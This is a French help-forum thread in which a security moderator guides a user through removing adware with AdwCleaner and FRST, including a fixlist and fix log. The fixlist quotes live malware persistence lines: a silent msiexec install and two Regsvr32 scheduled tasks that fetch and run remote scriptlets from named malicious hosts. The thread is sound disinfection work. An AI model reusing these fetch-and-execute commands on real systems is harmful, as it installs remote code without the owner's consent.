Startsearch
Résolu/Fermé
baliverne3
Messages postés
18
Date d'inscription
samedi 7 décembre 2013
Statut
Membre
Dernière intervention
2 mai 2017
-
30 avril 2017 à 22:07
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 2 mai 2017 à 21:44
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 2 mai 2017 à 21:44
4 réponses
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 643
30 avril 2017 à 22:19
30 avril 2017 à 22:19
Salut,
Windows a été infecté par des adwares et programmes parasites. Ces indésirables sont connus pour provoquer des affichages de publicités et occasionner de sérieux ralentissements sur tes navigateurs WEB.
Voici les étapes de la procédure à suivre :
1°)
Suis le tutoriel AdwCleaner d'Xplode
Si le copié/collé ne fonctionne pas, utilise le site http://pjjoint.malekal.com/ pour héberger ton rapport, donne le lien du rapport dans un nouveau message.
Note : Le rapport est également sauvegardé sous C:\AdwCleaner[S1].txt
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
3°) FRST
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Windows a été infecté par des adwares et programmes parasites. Ces indésirables sont connus pour provoquer des affichages de publicités et occasionner de sérieux ralentissements sur tes navigateurs WEB.
Voici les étapes de la procédure à suivre :
1°)
Suis le tutoriel AdwCleaner d'Xplode
- Télécharge le sur ton Bureau ou dans ton dossier des téléchargements,
- Lance "AdwCleaner" puis clique sur [Scanner],
- L'analyse va durer plusieurs minutes, patiente,
- Une fois le scan terminé, ne décoche rien, clique sur [Nettoyer],
- Une fois le nettoyage terminé, un rapport va s'ouvrir,
- Copie/colle le contenu du rapport dans ta prochaine réponse.
Si le copié/collé ne fonctionne pas, utilise le site http://pjjoint.malekal.com/ pour héberger ton rapport, donne le lien du rapport dans un nouveau message.
Note : Le rapport est également sauvegardé sous C:\AdwCleaner[S1].txt
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
3°) FRST
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
- FRST.txt
- Shortcut.txt
- Additionnal.txt
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
baliverne3
Messages postés
18
Date d'inscription
samedi 7 décembre 2013
Statut
Membre
Dernière intervention
2 mai 2017
30 avril 2017 à 23:36
30 avril 2017 à 23:36
Hello,
voici le 1er rapport :
# AdwCleaner v6.046 - Rapport créé le 30/04/2017 à 23:09:47
# Mis à jour le 24/04/2017 par Malwarebytes
# Base de données : 2017-04-29.1 [Locale]
# Système d'exploitation : Windows 10 Home (X64)
# Nom d'utilisateur : verotte - LAPTOP-UK2C7RQN
# Exécuté depuis : C:\Users\verotte\Downloads\adwcleaner_6.046.exe
# Mode: Nettoyage
# Support : https://www.malwarebytes.com/support/
[-] Service supprimé: FirefoxU
[-] Dossier supprimé: C:\Users\verotte\AppData\Local\Doeye
[-] Dossier supprimé: C:\Program Files (x86)\Doeye
[-] Dossier supprimé: C:\Program Files (x86)\Firefox
[-] Dossier supprimé: C:\Users\verotte\AppData\Roaming\Firefox
[-] Dossier supprimé: C:\Users\verotte\AppData\Local\Firefox
[-] Fichier supprimé: C:\Users\Public\Documents\temp.dat
[-] Fichier supprimé: C:\Users\Public\Documents\report.dat
[!] Fichier non supprimé: C:\ProgramData\SOFTWARE\APPLE\APPS\NOTIFICATION.DLL
[-] Clé supprimée: HKCU\SOFTWARE\Classes\ChromeHTML
[-] Clé supprimée: HKCU\SOFTWARE\Clients\StartMenuInternet\ChromeHTML
:: Clés "Tracing" supprimées
:: Paramètres Winsock réinitialisés
C:\AdwCleaner\AdwCleaner[C0].txt - [4769 octets] - [24/04/2017 22:46:51]
C:\AdwCleaner\AdwCleaner[C2].txt - [1558 octets] - [30/04/2017 23:09:47]
C:\AdwCleaner\AdwCleaner[S0].txt - [5499 octets] - [18/04/2017 21:25:13]
C:\AdwCleaner\AdwCleaner[S1].txt - [4669 octets] - [24/04/2017 22:45:29]
C:\AdwCleaner\AdwCleaner[S2].txt - [1941 octets] - [30/04/2017 23:00:48]
C:\AdwCleaner\AdwCleaner[S3].txt - [2014 octets] - [30/04/2017 23:05:07]
########## EOF - C:\AdwCleaner\AdwCleaner[C2].txt - [1928 octets] ##########
Le hic c'est que au redémarrage mon raccourci Firefox n'est plus actif et je me connecte donc a internet avec edge ( navigateur par defaut ) e pense qu'il va falloir que je reinstalle Firefox n'est ce pas ... ? je ferai ca demain
voici le 1er rapport :
# AdwCleaner v6.046 - Rapport créé le 30/04/2017 à 23:09:47
# Mis à jour le 24/04/2017 par Malwarebytes
# Base de données : 2017-04-29.1 [Locale]
# Système d'exploitation : Windows 10 Home (X64)
# Nom d'utilisateur : verotte - LAPTOP-UK2C7RQN
# Exécuté depuis : C:\Users\verotte\Downloads\adwcleaner_6.046.exe
# Mode: Nettoyage
# Support : https://www.malwarebytes.com/support/
- [ Services ] *****
[-] Service supprimé: FirefoxU
- [ Dossiers ] *****
[-] Dossier supprimé: C:\Users\verotte\AppData\Local\Doeye
[-] Dossier supprimé: C:\Program Files (x86)\Doeye
[-] Dossier supprimé: C:\Program Files (x86)\Firefox
[-] Dossier supprimé: C:\Users\verotte\AppData\Roaming\Firefox
[-] Dossier supprimé: C:\Users\verotte\AppData\Local\Firefox
- [ Fichiers ] *****
[-] Fichier supprimé: C:\Users\Public\Documents\temp.dat
[-] Fichier supprimé: C:\Users\Public\Documents\report.dat
[!] Fichier non supprimé: C:\ProgramData\SOFTWARE\APPLE\APPS\NOTIFICATION.DLL
- [ DLL ] *****
- [ WMI ] *****
- [ Raccourcis ] *****
- [ Tâches planifiées ] *****
- [ Registre ] *****
[-] Clé supprimée: HKCU\SOFTWARE\Classes\ChromeHTML
[-] Clé supprimée: HKCU\SOFTWARE\Clients\StartMenuInternet\ChromeHTML
- [ Navigateurs ] *****
- [ Navigateurs ] *****
:: Clés "Tracing" supprimées
:: Paramètres Winsock réinitialisés
C:\AdwCleaner\AdwCleaner[C0].txt - [4769 octets] - [24/04/2017 22:46:51]
C:\AdwCleaner\AdwCleaner[C2].txt - [1558 octets] - [30/04/2017 23:09:47]
C:\AdwCleaner\AdwCleaner[S0].txt - [5499 octets] - [18/04/2017 21:25:13]
C:\AdwCleaner\AdwCleaner[S1].txt - [4669 octets] - [24/04/2017 22:45:29]
C:\AdwCleaner\AdwCleaner[S2].txt - [1941 octets] - [30/04/2017 23:00:48]
C:\AdwCleaner\AdwCleaner[S3].txt - [2014 octets] - [30/04/2017 23:05:07]
########## EOF - C:\AdwCleaner\AdwCleaner[C2].txt - [1928 octets] ##########
Le hic c'est que au redémarrage mon raccourci Firefox n'est plus actif et je me connecte donc a internet avec edge ( navigateur par defaut ) e pense qu'il va falloir que je reinstalle Firefox n'est ce pas ... ? je ferai ca demain
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 643
30 avril 2017 à 23:48
30 avril 2017 à 23:48
Passe à FRST déjà.
baliverne3
Messages postés
18
Date d'inscription
samedi 7 décembre 2013
Statut
Membre
Dernière intervention
2 mai 2017
1 mai 2017 à 11:04
1 mai 2017 à 11:04
Je viens de telecharger FIRST , il est sur le bureau et ne s'ouvre pas( !) , j'ai fait la manip 2 fois ...
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 643
>
baliverne3
Messages postés
18
Date d'inscription
samedi 7 décembre 2013
Statut
Membre
Dernière intervention
2 mai 2017
1 mai 2017 à 12:03
1 mai 2017 à 12:03
Tu as quel antivirus ?
Il le bloque peut-être ?
Si tu renommes FRST en n'importe quoi, ça passe ?
Il le bloque peut-être ?
Si tu renommes FRST en n'importe quoi, ça passe ?
baliverne3
Messages postés
18
Date d'inscription
samedi 7 décembre 2013
Statut
Membre
Dernière intervention
2 mai 2017
1 mai 2017 à 21:30
1 mai 2017 à 21:30
Ca a fini par marcher , voici les liens vers les rapports :
https://pjjoint.malekal.com/files.php?id=20170501_v13p13t6l15b5
https://pjjoint.malekal.com/files.php?id=FRST_20170501_k6b11t7f15e12
https://pjjoint.malekal.com/files.php?id=20170501_p11b14m14n12b14
https://pjjoint.malekal.com/files.php?id=20170501_v13p13t6l15b5
https://pjjoint.malekal.com/files.php?id=FRST_20170501_k6b11t7f15e12
https://pjjoint.malekal.com/files.php?id=20170501_p11b14m14n12b14
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 643
Modifié le 1 mai 2017 à 22:42
Modifié le 1 mai 2017 à 22:42
Je te conseille de désinstaller McAfee Security Scan car c'est avant tout un programme markéting proposé à l'installation d'autres logiciels ( comme Adobe Flash) pour final tenter de te vendre l'antivirus.
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
Veuillez appuyer sur une touche pour continuer la désinfection...
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
C:\Program Files (x86)\ScreenShot
HKU\S-1-5-21-2972077697-245542667-4235198535-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9292504 2016-12-21] (Piriform Ltd)
2017-04-13 18:40 - 2017-03-20 10:53 - 00000000 ____D C:\Users\verotte\AppData\Roaming\ScreenShot
2017-04-18 20:06 - 2017-04-18 20:06 - 00000000 _____ C:\WINDOWS\SysWOW64\1
2017-04-17 17:47 - 2017-04-30 23:10 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-13 18:41 - 2017-04-13 18:41 - 00003692 _____ C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe
2017-04-13 18:40 - 2017-04-25 20:48 - 00003994 _____ C:\WINDOWS\System32\Tasks\Avast Emergency Update
2017-04-13 18:40 - 2017-04-13 18:40 - 00000000 ____D C:\Users\verotte\AppData\Roaming\SSMgre
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
HKU\S-1-5-21-2972077697-245542667-4235198535-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1XFkM5MdwyNWFyMkE3MTqcFjzYNTzSFTJYNWI3OYJWMc%3D%3D /q [Pays US - 104.24.101.133]
IFEO\taskmgr.exe: [Debugger]
Task: {99ECAE5C-2ACF-43C1-9FA0-5767D26DD4D8} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1XFkM5MdwyNWFyMkE3MTqcFjzYNTzSFTJYNWI3OYJWMc== scrobj.dll
Task: {D690FFD3-FC92-46D9-B81B-09397B9C0834} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1XFkM5MdwyNWFyMkE3MTqcFjzYNTzSFTJYNWI3OYJWMc== scrobj.dll
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
Veuillez appuyer sur une touche pour continuer la désinfection...
baliverne3
Messages postés
18
Date d'inscription
samedi 7 décembre 2013
Statut
Membre
Dernière intervention
2 mai 2017
1 mai 2017 à 23:05
1 mai 2017 à 23:05
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 01-05-2017
Exécuté par verotte (01-05-2017 22:50:45) Run:1
Exécuté depuis C:\Users\verotte\Desktop
Profils chargés: verotte (Profils disponibles: verotte)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
C:\Program Files (x86)\ScreenShot
HKU\S-1-5-21-2972077697-245542667-4235198535-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9292504 2016-12-21] (Piriform Ltd)
2017-04-13 18:40 - 2017-03-20 10:53 - 00000000 ____D C:\Users\verotte\AppData\Roaming\ScreenShot
2017-04-18 20:06 - 2017-04-18 20:06 - 00000000 _____ C:\WINDOWS\SysWOW64\1
2017-04-17 17:47 - 2017-04-30 23:10 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-13 18:41 - 2017-04-13 18:41 - 00003692 _____ C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe
2017-04-13 18:40 - 2017-04-25 20:48 - 00003994 _____ C:\WINDOWS\System32\Tasks\Avast Emergency Update
2017-04-13 18:40 - 2017-04-13 18:40 - 00000000 ____D C:\Users\verotte\AppData\Roaming\SSMgre
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
HKU\S-1-5-21-2972077697-245542667-4235198535-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1XFkM5MdwyNWFyMkE3MTqcFjzYNTzSFTJYNWI3OYJWMc%3D%3D /q [Pays US - 104.24.101.133]
IFEO\taskmgr.exe: [Debugger]
Task: {99ECAE5C-2ACF-43C1-9FA0-5767D26DD4D8} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1XFkM5MdwyNWFyMkE3MTqcFjzYNTzSFTJYNWI3OYJWMc== scrobj.dll
Task: {D690FFD3-FC92-46D9-B81B-09397B9C0834} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1XFkM5MdwyNWFyMkE3MTqcFjzYNTzSFTJYNWI3OYJWMc== scrobj.dll
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
C:\Program Files (x86)\ScreenShot => déplacé(es) avec succès
HKU\S-1-5-21-2972077697-245542667-4235198535-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CCleaner Monitoring => valeur supprimé(es) avec succès
C:\Users\verotte\AppData\Roaming\ScreenShot => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\1 => déplacé(es) avec succès
C:\Program Files (x86)\MIO => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\Avast Emergency Update => déplacé(es) avec succès
C:\Users\verotte\AppData\Roaming\SSMgre => déplacé(es) avec succès
SSSvc => Service arrêté avec succès.
HKLM\System\CurrentControlSet\Services\SSSvc => clé supprimé(es) avec succès
SSSvc => service supprimé(es) avec succès
HKU\S-1-5-21-2972077697-245542667-4235198535-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valeur supprimé(es) avec succès
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{99ECAE5C-2ACF-43C1-9FA0-5767D26DD4D8} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{99ECAE5C-2ACF-43C1-9FA0-5767D26DD4D8} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D690FFD3-FC92-46D9-B81B-09397B9C0834} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D690FFD3-FC92-46D9-B81B-09397B9C0834} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => clé supprimé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2972077697-245542667-4235198535-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2972077697-245542667-4235198535-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 308208 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 68210790 B
Java, Flash, Steam htmlcache => 1054 B
Windows/system/drivers => 53516234 B
Edge => 83875747 B
Chrome => 0 B
Firefox => 384682775 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 6656 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 1375 B
systemprofile32 => 24 B
LocalService => 2604 B
NetworkService => 14730 B
verotte => 176214085 B
RecycleBin => 0 B
EmptyTemp: => 731.3 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
Exécuté par verotte (01-05-2017 22:50:45) Run:1
Exécuté depuis C:\Users\verotte\Desktop
Profils chargés: verotte (Profils disponibles: verotte)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
C:\Program Files (x86)\ScreenShot
HKU\S-1-5-21-2972077697-245542667-4235198535-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9292504 2016-12-21] (Piriform Ltd)
2017-04-13 18:40 - 2017-03-20 10:53 - 00000000 ____D C:\Users\verotte\AppData\Roaming\ScreenShot
2017-04-18 20:06 - 2017-04-18 20:06 - 00000000 _____ C:\WINDOWS\SysWOW64\1
2017-04-17 17:47 - 2017-04-30 23:10 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-13 18:41 - 2017-04-13 18:41 - 00003692 _____ C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe
2017-04-13 18:40 - 2017-04-25 20:48 - 00003994 _____ C:\WINDOWS\System32\Tasks\Avast Emergency Update
2017-04-13 18:40 - 2017-04-13 18:40 - 00000000 ____D C:\Users\verotte\AppData\Roaming\SSMgre
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
HKU\S-1-5-21-2972077697-245542667-4235198535-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1XFkM5MdwyNWFyMkE3MTqcFjzYNTzSFTJYNWI3OYJWMc%3D%3D /q [Pays US - 104.24.101.133]
IFEO\taskmgr.exe: [Debugger]
Task: {99ECAE5C-2ACF-43C1-9FA0-5767D26DD4D8} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1XFkM5MdwyNWFyMkE3MTqcFjzYNTzSFTJYNWI3OYJWMc== scrobj.dll
Task: {D690FFD3-FC92-46D9-B81B-09397B9C0834} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1XFkM5MdwyNWFyMkE3MTqcFjzYNTzSFTJYNWI3OYJWMc== scrobj.dll
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
C:\Program Files (x86)\ScreenShot => déplacé(es) avec succès
HKU\S-1-5-21-2972077697-245542667-4235198535-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CCleaner Monitoring => valeur supprimé(es) avec succès
C:\Users\verotte\AppData\Roaming\ScreenShot => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\1 => déplacé(es) avec succès
C:\Program Files (x86)\MIO => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\Avast Emergency Update => déplacé(es) avec succès
C:\Users\verotte\AppData\Roaming\SSMgre => déplacé(es) avec succès
SSSvc => Service arrêté avec succès.
HKLM\System\CurrentControlSet\Services\SSSvc => clé supprimé(es) avec succès
SSSvc => service supprimé(es) avec succès
HKU\S-1-5-21-2972077697-245542667-4235198535-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valeur supprimé(es) avec succès
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{99ECAE5C-2ACF-43C1-9FA0-5767D26DD4D8} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{99ECAE5C-2ACF-43C1-9FA0-5767D26DD4D8} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D690FFD3-FC92-46D9-B81B-09397B9C0834} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D690FFD3-FC92-46D9-B81B-09397B9C0834} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => clé supprimé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2972077697-245542667-4235198535-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-2972077697-245542667-4235198535-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 308208 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 68210790 B
Java, Flash, Steam htmlcache => 1054 B
Windows/system/drivers => 53516234 B
Edge => 83875747 B
Chrome => 0 B
Firefox => 384682775 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 6656 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 1375 B
systemprofile32 => 24 B
LocalService => 2604 B
NetworkService => 14730 B
verotte => 176214085 B
RecycleBin => 0 B
EmptyTemp: => 731.3 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
Fin de Fixlog 22:51:47
baliverne3
Messages postés
18
Date d'inscription
samedi 7 décembre 2013
Statut
Membre
Dernière intervention
2 mai 2017
1 mai 2017 à 23:24
1 mai 2017 à 23:24
j'ai réinstallé firefox, par contre je ne peux pas le mettre comme navigateur par defaut car il ne figure plus dans la liste des navigateurs proposés dans les parametres .
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 643
>
baliverne3
Messages postés
18
Date d'inscription
samedi 7 décembre 2013
Statut
Membre
Dernière intervention
2 mai 2017
2 mai 2017 à 08:55
2 mai 2017 à 08:55
baliverne3
Messages postés
18
Date d'inscription
samedi 7 décembre 2013
Statut
Membre
Dernière intervention
2 mai 2017
2 mai 2017 à 20:47
2 mai 2017 à 20:47
Si !ca marche ! cool !
C'est bon l'ordi est clean là ??
Si c'est le cas ( ca a l'air ) merci Merci MERCI
...et j'arrête le streaming top compliqué pour moi ! ;-)
C'est bon l'ordi est clean là ??
Si c'est le cas ( ca a l'air ) merci Merci MERCI
...et j'arrête le streaming top compliqué pour moi ! ;-)
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 643
2 mai 2017 à 21:44
2 mai 2017 à 21:44
oui fais des analyses régulières avec Malwarebytes.
Tu peux tenter netflix, tu as un mois gratuit, à voir si le contenu te plait.
Supprime le dossier C:\FRST
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
Quelques conseils :
Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)
Tu peux tenter netflix, tu as un mois gratuit, à voir si le contenu te plait.
Supprime le dossier C:\FRST
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
Quelques conseils :
Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)
